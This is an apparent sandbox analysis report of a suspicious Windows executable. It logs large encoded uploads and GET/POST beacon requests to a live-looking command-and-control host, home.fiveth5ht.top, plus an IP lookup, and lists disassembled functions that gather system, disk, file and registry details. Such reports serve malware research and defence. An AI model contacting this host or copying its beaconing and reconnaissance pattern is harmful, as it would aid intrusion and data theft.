Dec 27, 2024 09:10:13.575427055 CET	2472	OUT	Data Raw: 65 79 36 76 6d 32 64 59 36 68 6c 32 58 59 5a 30 6f 31 63 54 69 47 31 46 56 4b 39 57 47 48 77 39 47 6e 43 43 6c 55 72 59 6a 45 34 69 72 53 77 2b 47 77 39 47 46 53 76 69 4d 52 55 70 30 4b 46 4f 70 56 71 51 67 2b 54 68 5c 2f 68 37 4f 2b 4b 73 32 77 Data Ascii: ey6vm2dY6hl2XYZ0o1cTiG1FVK9WGHw9GnCClUrYjE4irSw+Gw9GFSviMRUp0KFOpVqQg+Th\/h7O+Ks2wmRcPZbic2zbGuosNgsLFOpKNGnOtXqznOUKVDD4ahTqYjFYqvUpYfDYenUr4irTo05zjhV7t+zH+1\/+1F+xhJ40074Eap8Ntd8FeP\/ABJP4x1rwN8WNB13U9HsPFNxYW+n3etaReeFtY0LWo7nUba2s4ryM6nDa
Dec 27, 2024 09:10:13.694700956 CET	4944	OUT	Data Raw: 78 2b 6e 34 5c 2f 77 42 44 55 5c 2f 6c 50 36 66 6f 66 38 4b 5a 73 66 32 5c 2f 4c 5c 2f 77 43 79 6f 4e 4b 66 58 2b 76 36 5c 2f 77 43 47 4b 31 46 53 76 30 5c 2f 48 2b 68 71 4b 67 30 49 6e 36 5c 2f 68 5c 2f 55 30 79 70 4a 4f 33 34 5c 2f 77 42 4b 6a Data Ascii: x+n4\/wBDU\/lP6fof8KZsf2\/L\/wCyoNKfX+v6\/wCGK1FSv0\/H+hqKg0In6\/h\/U0ypJO34\/wBKjoNPaeX4\/wDAI5O34\/0qOrFQbH9vy\/8AsqDo9p5fj\/wCF+v4f1NQsu7+X1qw\/T8f6Gm4f3\/P\/wCvW3v\/AN38TQp7fL\/Q5\/lS1LJ0T6H+dRVR3e\/\/AHfxIZe\/+7\/jTOGHsamfp+P9DUVBRX8vZ757
Dec 27, 2024 09:10:13.694757938 CET	4944	OUT	Data Raw: 7a 6a 34 35 2b 4b 5c 2f 78 6f 38 65 5c 2f 41 6a 78 4e 38 49 66 67 4c 34 4f 75 39 4f 5c 2f 5a 53 2b 4d 50 68 66 39 6e 33 78 35 65 66 41 72 34 30 65 49 70 50 42 48 6a 76 77 35 6f 76 6a 66 77 6a 2b 30 46 2b 7a 44 34 74 30 48 57 4a 66 44 66 69 47 62 Data Ascii: zj45+K\/xo8e\/AjxN8IfgL4Ou9O\/ZS+MPhf9n3x5efAr40eIpPBHjvw5ovjfwj+0F+zD4t0HWJfDfiGb4maLa2Gnaxpvyt8HP2tbn4MfAnw\/4V+BXjHxz8KPil4X\/wCCb37TnwU+GNm\/hjxpN4j8B\/GHxx\/wU2T45fDTw7b+N7Lw7dWdl4usP2c1uPE+m\/EjSPECad4b12zgFp4u0r4hwadbJ99XGh6JdyLNdaPpVzM
Dec 27, 2024 09:10:13.694829941 CET	4944	OUT	Data Raw: 49 6e 34 6a 6c 6e 31 76 77 37 39 74 51 65 5a 5c 2f 5a 65 70 54 79 33 56 74 79 6b 72 6b 38 30 34 2b 46 5c 2f 44 4c 45 73 33 68 33 51 6d 5a 69 53 7a 48 53 4e 50 4a 4a 4a 79 53 53 62 66 4a 4a 50 4a 4a 35 4a 72 55 74 62 4f 7a 73 59 78 44 5a 57 6c 74 Data Ascii: In4jln1vw79tQeZ\/ZepTy3Vtykrk804+F\/DLEs3h3QmZiSzHSNPJJJySSbfJJPJJ5JrUtbOzsYxDZWltZwjGIrWCK3jGOmEhRF47ccV\/SfCXCnGORYyjPOuPMVxFltDCYnDQy2rlOVYKDlVq0p4WrKrg8JRrXy+lTlhcNGNSMalCpKeMWKxPJiIfyjx1xvwFxNgMRT4e8MsBwlm2KzKnj6ma4bO89zCcaSpcmIwUKGY5hiqH
Dec 27, 2024 09:10:13.737284899 CET	27192	OUT	Data Raw: 2f 72 37 66 30 5c 2f 38 41 31 30 75 52 65 66 38 41 58 79 4e 56 69 4b 65 39 52 76 70 33 5c 2f 54 31 38 30 6a 47 6b 48 51 5c 2f 68 55 64 61 46 78 59 33 6b 57 64 38 55 6a 70 5c 2f 30 7a 36 66 31 4e 55 32 58 37 6e 79 62 4f 33 54 5c 2f 41 44 7a 6a 36 Data Ascii: /r7f0\/8A10uRef8AXyNViKe9Rvp3\/T180jGkHQ\/hUdaFxY3kWd8Ujp\/0z6f1NU2X7nybO3T\/ADzj6VkdFN0nq3dedvL8NfUjooooNCKRc8+vB+vb\/PtTKU9T9T\/OkoNKfX5fqFRydvx\/pUlR\/vP84oNBH6\/h\/U0ynv1\/D+pplAEcnb8f6VHVio\/L9\/0\/+vQdBHRRRQBHJ2\/Go6sU1\/un8P5ig29\/+7+JD
Dec 27, 2024 09:10:20.335683107 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 08:10:20 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49726	5.101.3.217	80	3604	C:\Users\user\Desktop\OoYYtngD7d.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 09:10:20.667598009 CET	98	OUT	GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1 Host: home.fiveth5ht.top Accept: /
Dec 27, 2024 09:10:22.178390980 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 08:10:21 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49735	5.101.3.217	80	3604	C:\Users\user\Desktop\OoYYtngD7d.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 09:10:22.560959101 CET	171	OUT	POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 27, 2024 09:10:24.211860895 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 08:10:23 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49707	3.218.7.103	443	3604	C:\Users\user\Desktop\OoYYtngD7d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 08:10:10 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-27 08:10:11 UTC	224	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 08:10:11 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-27 08:10:11 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	03:10:05
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\OoYYtngD7d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\OoYYtngD7d.exe"
Imagebase:	0x470000
File size:	4'472'832 bytes
MD5 hash:	ED79B16C404FD4BDC0F3DE692CC154AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.3%
Total number of Nodes:	219
Total number of Limit Nodes:	32

Executed Functions

Function 004AF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON

Download Yara Rule

Strings

%s done, xrefs: 004AF9CD, 004AFD27, 004AFF03
%s connect timeout after %lldms, move on!, xrefs: 004AFA33
%s starting (timeout=%lldms), xrefs: 004AFCDD, 004AFEB1
connect.c, xrefs: 004AF3BB, 004AF4FA
all eyeballers failed, xrefs: 004B00FF
Connected to %s (%s) port %u, xrefs: 004B0026
ipv6, xrefs: 004AF3DC
created %s (timeout %lldms), xrefs: 004AF4BE, 004AF5DF
%s assess started=%d, result=%d, xrefs: 004B0150, 004B01AE
Failed to connect to %s port %u after %lld ms: %s, xrefs: 004B0254
Connection timeout after %lld ms, xrefs: 004B00AC
%s trying next, xrefs: 004AF8FE
%s connect -> %d, connected=%d, xrefs: 004AF720
Connection time-out, xrefs: 004AF2A3
ipv4, xrefs: 004AF331, 004AF34B, 004AF36C, 004AF3EC, 004AF5BB

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID:
String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
API String ID: 0-1590685507
Opcode ID: 8a5b66b544fa228f2d9eb817bf8c401d7ad5cae95537937a828cafbe47540aa8
Instruction ID: 9c06fab59cc59403592918e564e33b50e68f00ea8ea3dd8edff5ea50987700ba
Opcode Fuzzy Hash: 8a5b66b544fa228f2d9eb817bf8c401d7ad5cae95537937a828cafbe47540aa8
Instruction Fuzzy Hash: 44C2C031A043449FD724DF69C480B6BB7E1BF95318F04866EEC888B392D735E989CB85

Function 0047255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00472579
GlobalMemoryStatusEx.KERNELBASE ref: 004725CC
GetDriveTypeA.KERNELBASE ref: 00472647
GetDiskFreeSpaceExA.KERNELBASE ref: 0047267E
KiUserCallbackDispatcher.NTDLL ref: 004727E2
FindFirstFileW.KERNELBASE ref: 004728F8
FindNextFileW.KERNELBASE ref: 0047291F

Strings

;%G, xrefs: 004727FE
@, xrefs: 004725B4
`, xrefs: 004729BC

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
String ID: ;%G$@$`
API String ID: 3271271169-3612974686
Opcode ID: 12c45cf282332e3704ba8d10d1929eecbc2f8620e9ec7323034926e47a101233
Instruction ID: 8ef9dc5959ae946e3da399e7165cf87fe29af03aed144c53dfe12e1248efa859
Opcode Fuzzy Hash: 12c45cf282332e3704ba8d10d1929eecbc2f8620e9ec7323034926e47a101233
Instruction Fuzzy Hash: F7D192B49083199FCB10EF68C5856AEBBF0FF44344F018969E998D7351E7749A84CF92

Function 004729FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 00472A27
RegOpenKeyExA.KERNELBASE ref: 00472A8A
CharUpperA.USER32 ref: 00472AEF
QueryFullProcessImageNameA.KERNELBASE ref: 00472C26
CloseHandle.KERNELBASE ref: 00472C49
CloseHandle.KERNELBASE ref: 00472DFC

Strings

0, xrefs: 00472DA9

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
String ID: 0
API String ID: 2406880114-4108050209
Opcode ID: d3a1f50cddd5865208905f856da8946ead2ffab819cc69074a337da6237f1399
Instruction ID: f9a48cbb11d32bec733694412fa568896f014ab5c62b7fd9376db773fdc9f2a3
Opcode Fuzzy Hash: d3a1f50cddd5865208905f856da8946ead2ffab819cc69074a337da6237f1399
Instruction Fuzzy Hash: E5E1D8B49043099FCB50EF69D98569EBBF4FF44344F00886AE998D7350EB789A44CF42

Function 004805B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAEventSelect.WS2_32(?,?,?), ref: 00480712
WSAEventSelect.WS2_32(?,?,00000000), ref: 004809DD
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004809FC

Strings

multi.c, xrefs: 004807B2
N=G, xrefs: 00480A65

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID: EventSelect$EnumEventsNetwork
String ID: N=G$multi.c
API String ID: 2170980988-617635166
Opcode ID: 563ec809a55bdd5742409d21b67c2a06dd9e66353d611e7309d9132fe4fa26ec
Instruction ID: b97118263d64061247525d96da818aefd8e0c3f7f92cb832c43cc82a8816ee2e
Opcode Fuzzy Hash: 563ec809a55bdd5742409d21b67c2a06dd9e66353d611e7309d9132fe4fa26ec
Instruction Fuzzy Hash: 77D1DF716183019FE750EF60C881BAFB7E9BF94308F048C2EF88592251E378E949CB56

Function 0053B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getsockname.WS2_32(-00000020,-00000020,?), ref: 0053B2B7

Strings

cur != NULL, xrefs: 0053B3F2
ares__sortaddrinfo.c, xrefs: 0053B3ED

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID: getsockname
String ID: ares__sortaddrinfo.c$cur != NULL
API String ID: 3358416759-2430778319
Opcode ID: 22f467de7746c1d35d877a2bc8f23b8c7e1ad8516f551cb0211e7a8a99def623
Instruction ID: abf8a259c3361572d3c4a0364726f7c9c855a5b0c207390993fd174029cb150a
Opcode Fuzzy Hash: 22f467de7746c1d35d877a2bc8f23b8c7e1ad8516f551cb0211e7a8a99def623
Instruction Fuzzy Hash: C4C172716043159FE718DF24C885A6A7BE1FF88314F05896CFA498B3A2EB35ED45CB81

Function 00486FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 820752182b0b5d791351d4496b37b131d93bf5d5a8f8689eeb6312a9e9fcec60
Instruction ID: 1a84a43f22145ae99e564fdb30711e84f9a251bf9fac2b140441ab672afbc5c9
Opcode Fuzzy Hash: 820752182b0b5d791351d4496b37b131d93bf5d5a8f8689eeb6312a9e9fcec60
Instruction Fuzzy Hash: 5B91E33060D3094BD335AA2888A47BF72D5EBC1364F348F2EE9A8462D4E778DC41D796

Function 0053A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0052712E,?,?,?,00001001,00000000), ref: 0053A90C

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: a31aa6bfe71d069e538f97f9d1f16121c67abf84dd42776c2d829c8b85e005d8
Instruction ID: 1bf90f25a1a32423af352aad72d9f8d1b3d12435ed612d77910e08ba25e09bb3
Opcode Fuzzy Hash: a31aa6bfe71d069e538f97f9d1f16121c67abf84dd42776c2d829c8b85e005d8
Instruction Fuzzy Hash: 09F01D76109348AFD2209F41DC44E6BBBEDFFC9754F05496DF998232119271AE10CAB2

